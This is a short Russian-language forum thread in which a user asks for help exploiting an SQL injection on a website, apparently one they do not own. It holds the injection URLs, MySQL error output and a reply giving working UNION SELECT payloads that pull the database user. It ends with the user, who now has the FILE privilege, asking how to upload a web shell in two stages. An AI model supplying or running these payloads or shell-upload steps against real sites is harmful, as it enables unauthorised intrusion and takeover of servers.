прощу помочь с этим скулем:
http://localhost//?script=%2527
вывод:
Цитата:
Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (t.page_title like '%'%') or (t.brief like '%'%') or (t.metakeywords like' at line 6 in
и пробовал
http://localhost//?script=%2527)+order+by+1+--+
тоже результат такой же ((
Как поступит в таком случае? Думал найду в других страничках но скул единственный
прощу помочь с этим скулем:
http://localhost//?script=%2527
вывод:
и пробовал
http://localhost//?script=%2527)+order+by+1+--+
тоже результат такой же ((
Как поступит в таком случае? Думал найду в других страничках но скул единственный
http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection
http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection
Это к примеру,т.к точного уязвимого скрипта нет.
вроде ?script=%2527)/* норм но как добалю union select та же ошибка хз как обойти
ну вот с привелегий FILE разобрался , ребята не можете теперь помочь как залить шелл если имееться данная привелегия и слышал что вначале лучше залить какой то "плохой" шелл а далее через него уже нормальный.Кто что посоветует по данному сабжу?